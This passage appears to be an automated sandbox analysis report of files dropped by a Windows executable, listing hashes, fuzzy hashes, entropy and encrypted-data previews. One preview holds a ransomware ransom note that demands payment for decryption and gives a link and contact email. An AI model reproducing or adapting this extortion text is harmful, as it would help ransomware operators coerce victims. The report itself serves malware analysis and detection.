                                                                                                  SHA-512:3985E35A9899205C9E6139E4FC8B419587E1287B4E049A02F7C6046A31FAADDE758D512E42F60299516A0BDB71FFAB0C5FBF36AFFB4EF471F853DEBB738DCEBD
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:.......5$.~...g..o3%.....^)qED.F.........>...g.&..vc2......P...d.F...O.a.......5g:b....\...1.N"..x...@...+....?..... ...r....!.Q...y..-... ......4)[..F.....6'N.b.t.WE.......F..QR).+...............V..d.O.T.|p.n.=b.=...k....(.q.L.f.].p..!..").5.a.odx<i......8%..}......[..X:.b.*....86.3..5..v...xN\...I.+..~.In/.?s.+".h.(.2....C..1fm*:g.ot=Q.{....Z..E.14.....4l&(.F......t. O7....+....$......2..$r.Bv..g.VQW..L'\.....n{.a.~D.L.ks.k..OL.P%...\..............D.5....6xN...lR..n.qK.....W.4I._..q.5...C.[.H.Nh......>.g0`k.....|...k.....H.....5...N..Y%.O.<..e.......KH.d`...+..#..>....jM.Cf4......e.2..O.LP.w.&...i._...@.6..2.Y..r......T4.'...xS.X....r.}.....=t%gdY.$../\j..j......l.....`.l..C..R)x.o....7....Q.....u......1...]...n.0...'2..e..=....$W...[n..J.....G.p.^....,.=.V.0Q..Y].O`.h..JE)...V.a..p.s...*V.....+.C...?n...R.Jf.....B.H(.`..|X...s...#..R.RRv.fM.+..9..qf)>.M{._.L...WC..e!N..y......n...}. hQ.Hf...[..x..O..Hx......#.2..d.@.%I.....rS.].)
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):524622
                                                                                                  Entropy (8bit):4.257487531343731
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:/E7DuLxpHFNKwBkwDnNehlbFaJDlxHbbCh/Hc1/QaVHB1HNNTN4n://LxZzkwzN6ac8RVw
                                                                                                  MD5:B6293236E2337DD9A6EBE5B3E516F0B5
                                                                                                  SHA1:A6841DC1792F2CD47CD153A982A193849B67D430
                                                                                                  SHA-256:0C7C4FB0AF8279B609C463F15E15EFB69F4D23C27745626692C8423EE70B613A
                                                                                                  SHA-512:3985E35A9899205C9E6139E4FC8B419587E1287B4E049A02F7C6046A31FAADDE758D512E42F60299516A0BDB71FFAB0C5FBF36AFFB4EF471F853DEBB738DCEBD
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:.......5$.~...g..o3%.....^)qED.F.........>...g.&..vc2......P...d.F...O.a.......5g:b....\...1.N"..x...@...+....?..... ...r....!.Q...y..-... ......4)[..F.....6'N.b.t.WE.......F..QR).+...............V..d.O.T.|p.n.=b.=...k....(.q.L.f.].p..!..").5.a.odx<i......8%..}......[..X:.b.*....86.3..5..v...xN\...I.+..~.In/.?s.+".h.(.2....C..1fm*:g.ot=Q.{....Z..E.14.....4l&(.F......t. O7....+....$......2..$r.Bv..g.VQW..L'\.....n{.a.~D.L.ks.k..OL.P%...\..............D.5....6xN...lR..n.qK.....W.4I._..q.5...C.[.H.Nh......>.g0`k.....|...k.....H.....5...N..Y%.O.<..e.......KH.d`...+..#..>....jM.Cf4......e.2..O.LP.w.&...i._...@.6..2.Y..r......T4.'...xS.X....r.}.....=t%gdY.$../\j..j......l.....`.l..C..R)x.o....7....Q.....u......1...]...n.0...'2..e..=....$W...[n..J.....G.p.^....,.=.V.0Q..Y].O`.h..JE)...V.a..p.s...*V.....+.C...?n...R.Jf.....B.H(.`..|X...s...#..R.RRv.fM.+..9..qf)>.M{._.L...WC..e!N..y......n...}. hQ.Hf...[..x..O..Hx......#.2..d.@.%I.....rS.].)
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):524622
                                                                                                  Entropy (8bit):3.207391479153016
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:PYQzN7zLVUcn44o6HfOZSahEEYd7UDbo0FgQV7cLZF0cyI1BldeUiX:PX7tY4RHf6EjtUtgQmYFgBmUiX
                                                                                                  MD5:FB4083DD6BE9865519BD8299EFD0EFA9
                                                                                                  SHA1:7523879145C7BAFF8D13365767FE1BC494A70FE2
                                                                                                  SHA-256:302425EF4A5142984D502EEC35BFBF7EBBC302D724FB95B8BF688C4012881E51
                                                                                                  SHA-512:213A519F600D49AAD0A809D5597300AFB1DCFEF61541539FF07346AC688DF56FC7E56205CCDBE5321095AEA279D14EC3A148FF6085010988E18DCF4911F31BC1
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:..76..7......`GI1.o..Q...-r......3..V.../|".$.....>=s.......y.l.z.%...=....RBH+.D..{b.xO.H.(.d4=.....cT..TS..<.W.....u....1.V.n:.%.~.<.~..FC.r..J...C.9...f._...{2........~.g.v..3.r..4......R.O.B.~[...J...A..:u..f.r4........&="....gVzxf2.T[.vl.$.j`y..s'....4j.!|..fA.] .%......#..5*.+[)q.f..)...H.o.9.h+...r.eZ.x..W.;V...k...p...*..x.E.e..,....L.U.4...B35.......f..F6...r.....p..OI...d"......k....z...W..i.A..g/...|n.........Z<q)....\.]..}..#.?.E..rH.[Z..N.r.._..X.>h`qL....A.O..Q.F...R./C>._AL.....P.[R%....&.L@...;.4k.(%3<d.:-...."_qW);.5.wI.,"u.M.>J.-F..C....q0.HW+G[{_.m....c~.k..Xe.[.!...4j5P?...........R...i.6......Yb...|.sWfg.}~3.^r]/../.L...@.F.P.....~.1F)..1.B .9..t...;D.3...=.a.H..X.....#..<.A9.8.).9j2....<.ETE5.>.y%9..i.dUD.mk.+h....AH0.....!....q.FRB.....R&:0E....LZ.U.A...7....c.)...o.p1 .h.x..G..@......;c.....h.....=W.._)...7..M..(Gc^..).....H.....OV...[..]S.A.9 7P../.....j.....^.i...~_.F.h...@.M%J.+.....Y...rM.jm..I...L.....;p..;.i.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):524622
                                                                                                  Entropy (8bit):3.207391479153016
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:PYQzN7zLVUcn44o6HfOZSahEEYd7UDbo0FgQV7cLZF0cyI1BldeUiX:PX7tY4RHf6EjtUtgQmYFgBmUiX
                                                                                                  MD5:FB4083DD6BE9865519BD8299EFD0EFA9
                                                                                                  SHA1:7523879145C7BAFF8D13365767FE1BC494A70FE2
                                                                                                  SHA-256:302425EF4A5142984D502EEC35BFBF7EBBC302D724FB95B8BF688C4012881E51
                                                                                                  SHA-512:213A519F600D49AAD0A809D5597300AFB1DCFEF61541539FF07346AC688DF56FC7E56205CCDBE5321095AEA279D14EC3A148FF6085010988E18DCF4911F31BC1
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:..76..7......`GI1.o..Q...-r......3..V.../|".$.....>=s.......y.l.z.%...=....RBH+.D..{b.xO.H.(.d4=.....cT..TS..<.W.....u....1.V.n:.%.~.<.~..FC.r..J...C.9...f._...{2........~.g.v..3.r..4......R.O.B.~[...J...A..:u..f.r4........&="....gVzxf2.T[.vl.$.j`y..s'....4j.!|..fA.] .%......#..5*.+[)q.f..)...H.o.9.h+...r.eZ.x..W.;V...k...p...*..x.E.e..,....L.U.4...B35.......f..F6...r.....p..OI...d"......k....z...W..i.A..g/...|n.........Z<q)....\.]..}..#.?.E..rH.[Z..N.r.._..X.>h`qL....A.O..Q.F...R./C>._AL.....P.[R%....&.L@...;.4k.(%3<d.:-...."_qW);.5.wI.,"u.M.>J.-F..C....q0.HW+G[{_.m....c~.k..Xe.[.!...4j5P?...........R...i.6......Yb...|.sWfg.}~3.^r]/../.L...@.F.P.....~.1F)..1.B .9..t...;D.3...=.a.H..X.....#..<.A9.8.).9j2....<.ETE5.>.y%9..i.dUD.mk.+h....AH0.....!....q.FRB.....R&:0E....LZ.U.A...7....c.)...o.p1 .h.x..G..@......;c.....h.....=W.._)...7..M..(Gc^..).....H.....OV...[..]S.A.9 7P../.....j.....^.i...~_.F.h...@.M%J.+.....Y...rM.jm..I...L.....;p..;.i.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):355
                                                                                                  Entropy (8bit):7.299549194754596
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:s04VP1OZ+VoA/N0tp03D/puvlGyaYl0w4lzvlF6a2hIJNWbvTcLO5dXVjeLsciik:R6ttVoAuta3D/GXaYlQzvf6aAIJEDTEU
                                                                                                  MD5:9A402FC0268E594286B51E3A55AC9373
                                                                                                  SHA1:8E3B711D0E9B17E2C4B41D93093C1064A64049C5
                                                                                                  SHA-256:64BA4B4408EECC9216420F86B07750DD083D4334DD9A60CB5D4B8A72BE833295
                                                                                                  SHA-512:29DB0F11AC710322E596A0686DD5D3DA948C2921CA729A580ACE336E86957A57960AB46DFCE61065535D25BB1FC970293DC90D37DEEA8B3B7F56A2761BFD391E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:W10RS..k..H.L3....}68..d....}.CLf5..+.X..$..Z];.b>..".k@......l(GJU...!.wA........"M(.#.J..Q...K..<7..zd.l..4....H...gy@.....MS..!.w..d..Mk.WJ.v.]..H_...Q.*.i..=...jE...;.....KAf...k..#.p...5U.u....n.....`.|..7...@.:K..X..F.(.....4......>.. .............Sfya.....)m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):355
                                                                                                  Entropy (8bit):7.299549194754596
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:s04VP1OZ+VoA/N0tp03D/puvlGyaYl0w4lzvlF6a2hIJNWbvTcLO5dXVjeLsciik:R6ttVoAuta3D/GXaYlQzvf6aAIJEDTEU
                                                                                                  MD5:9A402FC0268E594286B51E3A55AC9373
                                                                                                  SHA1:8E3B711D0E9B17E2C4B41D93093C1064A64049C5
                                                                                                  SHA-256:64BA4B4408EECC9216420F86B07750DD083D4334DD9A60CB5D4B8A72BE833295
                                                                                                  SHA-512:29DB0F11AC710322E596A0686DD5D3DA948C2921CA729A580ACE336E86957A57960AB46DFCE61065535D25BB1FC970293DC90D37DEEA8B3B7F56A2761BFD391E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:W10RS..k..H.L3....}68..d....}.CLf5..+.X..$..Z];.b>..".k@......l(GJU...!.wA........"M(.#.J..Q...K..<7..zd.l..4....H...gy@.....MS..!.w..d..Mk.WJ.v.]..H_...Q.*.i..=...jE...;.....KAf...k..#.p...5U.u....n.....`.|..7...@.:K..X..F.(.....4......>.. .............Sfya.....)m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2105678
                                                                                                  Entropy (8bit):0.9719724754468697
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:9gjHc5UAbz1LokfHo4tegZjHRwvsyW3TOsLsTuOHBrwbIfVIgenv7YWTmd6s:9octLosHEgZ+v83TO4sTupIfVLaM
                                                                                                  MD5:7EB4F4718337B69255E93100B9CC9C00
                                                                                                  SHA1:5E71D5AD5B047F0AE08BD23888FD0C923F540EFD
                                                                                                  SHA-256:B8A6B921C1CDFE6D13F0335D2C1A351369E7ED57A12C40A402AA6C77182D8060
                                                                                                  SHA-512:6941782F7A690592F0A2D35C052FC7B49813795867D6B31BDF819F12F4E01695A3C9D8EDDAB2846AB011E49C06D95566817763A65F836B84784D384D1EB13A56
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:k..Q..b.S.E`....0......7.Z..@{>...;K.''j....q ..4...S.%._)....E...1.12.+H.U.;.WZ.rL%0.+....<.....0)@Em.....o,.@6"cA..h....0.yb.O..V....v..C......B..8.p...0s.......V...'.....Jc.o.........k......q.!.dr..c..L7.x.hD.(2...I..h../ ...\&..)./.....n..H.9.....8..f...9...D.8i\......K.......a.#..@~.x..e.q<....c.e:....z6..C......_....N..e...Q@.K].N..g#*.!..b7....U....{.n@.g]W~&..<&5.{..P..hT.......*)....Z. .-..eR.......< ..2@R.HGib........A...9..y..8...l...f..9I......}.;])...,....f.........d*.F.........P.u#.p..db...PR.J%.NHM..v.>..C.pH..r,..Y...tk#N..M..y....A./.H.....y..&...B<...X..Z3.[.w.......d..4..K%!......jh..F7..Q...1.+..8.Z.......[..|..u=.dH...0.x..<.e../...$.w....!.KM.T.L..f<.*T.,M.c[h....6....-..j3....wtgI4X..}..x.<..`hR....a....w..\....=..%....r.Z.EK.G...F....@...${s_.oQ...z...JF..V...z...5...Upy.=.1.y..$.1C[<gD..`;.m..15.G_.Gi.$.iNg..sm...C......?"..l.....^.A.}3h...=..n....Um...2.........cg$u.@.Xs.z.,..|.M.j.Z].h......+)D.h.C7...XY.......
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2105678
                                                                                                  Entropy (8bit):0.9719724754468697
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:9gjHc5UAbz1LokfHo4tegZjHRwvsyW3TOsLsTuOHBrwbIfVIgenv7YWTmd6s:9octLosHEgZ+v83TO4sTupIfVLaM
                                                                                                  MD5:7EB4F4718337B69255E93100B9CC9C00
                                                                                                  SHA1:5E71D5AD5B047F0AE08BD23888FD0C923F540EFD
                                                                                                  SHA-256:B8A6B921C1CDFE6D13F0335D2C1A351369E7ED57A12C40A402AA6C77182D8060
                                                                                                  SHA-512:6941782F7A690592F0A2D35C052FC7B49813795867D6B31BDF819F12F4E01695A3C9D8EDDAB2846AB011E49C06D95566817763A65F836B84784D384D1EB13A56
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:k..Q..b.S.E`....0......7.Z..@{>...;K.''j....q ..4...S.%._)....E...1.12.+H.U.;.WZ.rL%0.+....<.....0)@Em.....o,.@6"cA..h....0.yb.O..V....v..C......B..8.p...0s.......V...'.....Jc.o.........k......q.!.dr..c..L7.x.hD.(2...I..h../ ...\&..)./.....n..H.9.....8..f...9...D.8i\......K.......a.#..@~.x..e.q<....c.e:....z6..C......_....N..e...Q@.K].N..g#*.!..b7....U....{.n@.g]W~&..<&5.{..P..hT.......*)....Z. .-..eR.......< ..2@R.HGib........A...9..y..8...l...f..9I......}.;])...,....f.........d*.F.........P.u#.p..db...PR.J%.NHM..v.>..C.pH..r,..Y...tk#N..M..y....A./.H.....y..&...B<...X..Z3.[.w.......d..4..K%!......jh..F7..Q...1.+..8.Z.......[..|..u=.dH...0.x..<.e../...$.w....!.KM.T.L..f<.*T.,M.c[h....6....-..j3....wtgI4X..}..x.<..`hR....a....w..\....=..%....r.Z.EK.G...F....@...${s_.oQ...z...JF..V...z...5...Upy.=.1.y..$.1C[<gD..`;.m..15.G_.Gi.$.iNg..sm...C......?"..l.....^.A.}3h...=..n....Um...2.........cg$u.@.Xs.z.,..|.M.j.Z].h......+)D.h.C7...XY.......
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):576
                                                                                                  Entropy (8bit):7.637949060194871
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:zWQDb5AANgtk48qTWx2L175QZC0Kr6bJhC+nzqBX/TtEwVdcii9a:7Dtng+PEL1FmC0KrGC+nz5qbD
                                                                                                  MD5:C31CD371C7D8ED3A5ACC03AF45ABCD17
                                                                                                  SHA1:3E2CE2CE3F70917E809B102BDB5AB8695964BC32
                                                                                                  SHA-256:5AAEE123D23C0CBCDE175A8AE68CD98BD4E7969568020F3382BFF3FB1C407C9E
                                                                                                  SHA-512:C4D527A797BB744E8EA5FF6ECDC8FAA3C7CEB35577AC25D3BA9BE31ED630A6109C81CA2A99D85EC50382783EF27B9B86F178A620A5947AA976572216975E30B4
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:CKE3...di..W.........,....x..u.DFb..A.e..u..q]l....s.......vf..........r.s59..~Q.@T..x....\......=.Zw...@k.7$.^.b...;..G.{...".i..B.x..../C.U>.+cox.......q...@....J.q%.............._c..hf.U.>8.$.e.y...'.\4U..w.#..M.@...._m...,....28].r....4..Ev..P..Zz.!0.G..,...........v..]....}o!.|...-.V..]....}J.....:V?.f.FS8G..D.yGR......*.*.P.......J:.!...O...~.x.>.......-..X..(....M.@.:.Lk....<.*x..m6.K..3..g.j..x,h....C...Q{d...........8;...:.........Q.Yf...(m/d..l.G..m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):576
                                                                                                  Entropy (8bit):7.637949060194871
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:zWQDb5AANgtk48qTWx2L175QZC0Kr6bJhC+nzqBX/TtEwVdcii9a:7Dtng+PEL1FmC0KrGC+nz5qbD
                                                                                                  MD5:C31CD371C7D8ED3A5ACC03AF45ABCD17
                                                                                                  SHA1:3E2CE2CE3F70917E809B102BDB5AB8695964BC32
                                                                                                  SHA-256:5AAEE123D23C0CBCDE175A8AE68CD98BD4E7969568020F3382BFF3FB1C407C9E
                                                                                                  SHA-512:C4D527A797BB744E8EA5FF6ECDC8FAA3C7CEB35577AC25D3BA9BE31ED630A6109C81CA2A99D85EC50382783EF27B9B86F178A620A5947AA976572216975E30B4
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:CKE3...di..W.........,....x..u.DFb..A.e..u..q]l....s.......vf..........r.s59..~Q.@T..x....\......=.Zw...@k.7$.^.b...;..G.{...".i..B.x..../C.U>.+cox.......q...@....J.q%.............._c..hf.U.>8.$.e.y...'.\4U..w.#..M.@...._m...,....28].r....4..Ev..P..Zz.!0.G..,...........v..]....}o!.|...-.V..]....}J.....:V?.f.FS8G..D.yGR......*.*.P.......J:.!...O...~.x.>.......-..X..(....M.@.:.Lk....<.*x..m6.K..3..g.j..x,h....C...Q{d...........8;...:.........Q.Yf...(m/d..l.G..m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):872
                                                                                                  Entropy (8bit):7.738249805887086
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JYIRPr1CxUJpLjXD0FQ8my1K4mh4xZvzVpL31XqbD:X1CxQ6s4mh0hVl1XID
                                                                                                  MD5:1D089C82C5E546B50D6DD977D8B8793D
                                                                                                  SHA1:6EBF5B1504478E9796CE1E6B63A94199BE6DB4E1
                                                                                                  SHA-256:4F3A21E24B92ED50343BBDA86A4C8AFDC1BC2950B51F7EA62350BD45E48FF9B7
                                                                                                  SHA-512:032F78D2F4F3532611B9153D09ECF1B9BB8D9D56BEE0C5C3BAD8FAEA3053DDE8CB78797C7A57B1879148908B29AE8800BA5EC1E3FFCC7BAC66400A10BD7D3F64
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:HOME..!.......[.N.}k....*A.t.h.gkU.w.....yS.rJ2F9v.;`I../>.,..0.iXe...?..9+h..8..){.j..8..E..~+.).r.....#..jz...B<..(z...O..M]... .a..=.Y....G.Ho....`..]..m.w.D7...%...I..2Qy.....w.....QO.f1.2u....AlS2.....t...f+......e...g.\.z.{j.g?...x....7..N.....t.j:oBKS...'.. ..o.....FPO...C:._b.S...J..=`..m.....7p.cD.. )....x&.Q=F(.Lycy...?Mm......r.......+....4...$0^).3.F.F...F.O...QD.....r...G......u.'v.<z+.kj.......jeZ..)..R.S.A...#..U..P.o.n.i.X.X.rVo.0.R.(/...2UX.......W~f....s.$...C....bL...+o.j...q.....H..3......... .t.J].....8..*.w.^._....W..%./.....j.q..jVe..-.x.'....Lq.l..3'....R._.*....y..7vF..Q....$.vv.0..\...mo..6.Y....W..i.u....3.._..XZ...X..G?....~...U.6F.)Al.......D$..WNfn.....Z....W.`[...,Im$..7....t.BG_B..-.[.=..!.).nx.O.x..*.a.._.Fn.....1_<0.2.K..?.3m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):872
                                                                                                  Entropy (8bit):7.738249805887086
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JYIRPr1CxUJpLjXD0FQ8my1K4mh4xZvzVpL31XqbD:X1CxQ6s4mh0hVl1XID
                                                                                                  MD5:1D089C82C5E546B50D6DD977D8B8793D
                                                                                                  SHA1:6EBF5B1504478E9796CE1E6B63A94199BE6DB4E1
                                                                                                  SHA-256:4F3A21E24B92ED50343BBDA86A4C8AFDC1BC2950B51F7EA62350BD45E48FF9B7
                                                                                                  SHA-512:032F78D2F4F3532611B9153D09ECF1B9BB8D9D56BEE0C5C3BAD8FAEA3053DDE8CB78797C7A57B1879148908B29AE8800BA5EC1E3FFCC7BAC66400A10BD7D3F64
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:HOME..!.......[.N.}k....*A.t.h.gkU.w.....yS.rJ2F9v.;`I../>.,..0.iXe...?..9+h..8..){.j..8..E..~+.).r.....#..jz...B<..(z...O..M]... .a..=.Y....G.Ho....`..]..m.w.D7...%...I..2Qy.....w.....QO.f1.2u....AlS2.....t...f+......e...g.\.z.{j.g?...x....7..N.....t.j:oBKS...'.. ..o.....FPO...C:._b.S...J..=`..m.....7p.cD.. )....x&.Q=F(.Lycy...?Mm......r.......+....4...$0^).3.F.F...F.O...QD.....r...G......u.'v.<z+.kj.......jeZ..)..R.S.A...#..U..P.o.n.i.X.X.rVo.0.R.(/...2UX.......W~f....s.$...C....bL...+o.j...q.....H..3......... .t.J].....8..*.w.^._....W..%./.....j.q..jVe..-.x.'....Lq.l..3'....R._.*....y..7vF..Q....$.vv.0..\...mo..6.Y....W..i.u....3.._..XZ...X..G?....~...U.6F.)Al.......D$..WNfn.....Z....W.`[...,Im$..7....t.BG_B..-.[.=..!.).nx.O.x..*.a.._.Fn.....1_<0.2.K..?.3m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1193
                                                                                                  Entropy (8bit):7.813161804824869
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Eio3PJ/H2V1zzz0t+r7qBkdGhn7gwczWTmkAEs5aWdqbD:y3yzIMr7Ghn6zWTmwGdID
                                                                                                  MD5:4D5B37F5D7B81EF18CFECC26013DB69D
                                                                                                  SHA1:5FA7FB21B4BFE45533E0DA78F65E9B97FAD6CC56
                                                                                                  SHA-256:3A72EAAC200EEA238095B30636ABDD1E18827EB463C07E73A000C48F2037BDBF
                                                                                                  SHA-512:830BDE05E830284F75FC06762AE261705239DAC3F2BC320BE1F4D9D4FD20C93C8414FC852E5C6C1E4EA55832E0EB24D498D7BD3861B959F347830EE01A8B2803
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:<?xml.9M,.A.P.Y.7.DC....G..=..f....LX...qN.9.?s5...$u.x:.......E>....".2.MY...jH"..Ff?Yv..b......S.............X\rF.K.'R..}......*+..S0...W...=>...a...9.....E..F..A.~G.=.).;e&..{t@...%.^..-4.....I.$.}...J.!...>.^K#jq..m.A...5] .9.\r\.4....>..@.4...Bw ........z.6V.R~...E..-:,.$.{.........HO...I.h.I.d.}....fh.{z....b.........m...o.z +.P...q......w...E*.....|5:.YS.....`.8t-..q.S,..|..{a.n.*:.o.E.CX...K..[......;..E..,....i..F.8......c........./9...!b..h\.f}}..w....Z..$.K..|d.$..|N_j..c .|..........9r. ...E.......}.G./s>..M.".cB.f."~.}....G.....v.&8.._.wm)..a[..2..&....w.V.6].......#...V..A..S}Nq?-.Hu.....8...+5$.....8...3B].aI..M<.....V.....b...#.....X......+.U...$<......;.]h...k;..oD......}D......R.e+.nf.{..C....Z......&?...5.G...\+cy9V8.....t..g.(.6.f...o.J$..+j..z~...+...<^...%....RL...8.gf.O(.,......J|..O....T.Pe..X..)8.+_..f;..S. ...C..^.O\.[.+...].....t3.E..A.......*./+h#..N....z..K%.D.......p...A.:..*...}........32lq(.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1193
                                                                                                  Entropy (8bit):7.813161804824869
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Eio3PJ/H2V1zzz0t+r7qBkdGhn7gwczWTmkAEs5aWdqbD:y3yzIMr7Ghn6zWTmwGdID
                                                                                                  MD5:4D5B37F5D7B81EF18CFECC26013DB69D
                                                                                                  SHA1:5FA7FB21B4BFE45533E0DA78F65E9B97FAD6CC56
                                                                                                  SHA-256:3A72EAAC200EEA238095B30636ABDD1E18827EB463C07E73A000C48F2037BDBF
                                                                                                  SHA-512:830BDE05E830284F75FC06762AE261705239DAC3F2BC320BE1F4D9D4FD20C93C8414FC852E5C6C1E4EA55832E0EB24D498D7BD3861B959F347830EE01A8B2803
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:<?xml.9M,.A.P.Y.7.DC....G..=..f....LX...qN.9.?s5...$u.x:.......E>....".2.MY...jH"..Ff?Yv..b......S.............X\rF.K.'R..}......*+..S0...W...=>...a...9.....E..F..A.~G.=.).;e&..{t@...%.^..-4.....I.$.}...J.!...>.^K#jq..m.A...5] .9.\r\.4....>..@.4...Bw ........z.6V.R~...E..-:,.$.{.........HO...I.h.I.d.}....fh.{z....b.........m...o.z +.P...q......w...E*.....|5:.YS.....`.8t-..q.S,..|..{a.n.*:.o.E.CX...K..[......;..E..,....i..F.8......c........./9...!b..h\.f}}..w....Z..$.K..|d.$..|N_j..c .|..........9r. ...E.......}.G./s>..M.".cB.f."~.}....G.....v.&8.._.wm)..a[..2..&....w.V.6].......#...V..A..S}Nq?-.Hu.....8...+5$.....8...3B].aI..M<.....V.....b...#.....X......+.U...$<......;.]h...k;..oD......}D......R.e+.nf.{..C....Z......&?...5.G...\+cy9V8.....t..g.(.6.f...o.J$..+j..z~...+...<^...%....RL...8.gf.O(.,......J|..O....T.Pe..X..)8.+_..f;..S. ...C..^.O\.[.+...].....t3.E..A.......*./+h#..N....z..K%.D.......p...A.:..*...}........32lq(.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1114
                                                                                                  Entropy (8bit):4.8827532502789115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWrmFRqrl3W4kA+GT/kF5M2/kLw3KTJHA:WZHfv0p6WrPFWrDGT0f/krhA
                                                                                                  MD5:E8267A39BEC3FFF1F904889A55641314
                                                                                                  SHA1:9F433D2CB6DD8CC9AEFA23DF241B9B1D56DD37ED
                                                                                                  SHA-256:329CE4E9391A5C5EE263E7076FB2D06E989CF077C63C603202F87A1582EDEAD6
                                                                                                  SHA-512:BAF10AF4BB7298A64982EFFC8121D97B480BBD6FFB28383C68A249A56F3334A54BD25290579BCFC1993B4EFE9915A132E8C4C1A2BAC77BA6CFEE6561AA3BAA88
                                                                                                  Malicious:true
                                                                                                  Reputation:unknown
                                                                                                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-vKvLYNOV9o..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1114
                                                                                                  Entropy (8bit):4.8827532502789115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWrmFRqrl3W4kA+GT/kF5M2/kLw3KTJHA:WZHfv0p6WrPFWrDGT0f/krhA
                                                                                                  MD5:E8267A39BEC3FFF1F904889A55641314
                                                                                                  SHA1:9F433D2CB6DD8CC9AEFA23DF241B9B1D56DD37ED
                                                                                                  SHA-256:329CE4E9391A5C5EE263E7076FB2D06E989CF077C63C603202F87A1582EDEAD6
